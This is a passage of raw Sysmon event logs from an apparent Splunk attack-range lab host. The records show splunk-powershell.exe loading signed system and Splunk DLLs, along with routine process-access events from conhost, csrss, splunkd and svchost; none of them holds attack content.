734700x800000000000000099383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.068{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000099352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000099347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program 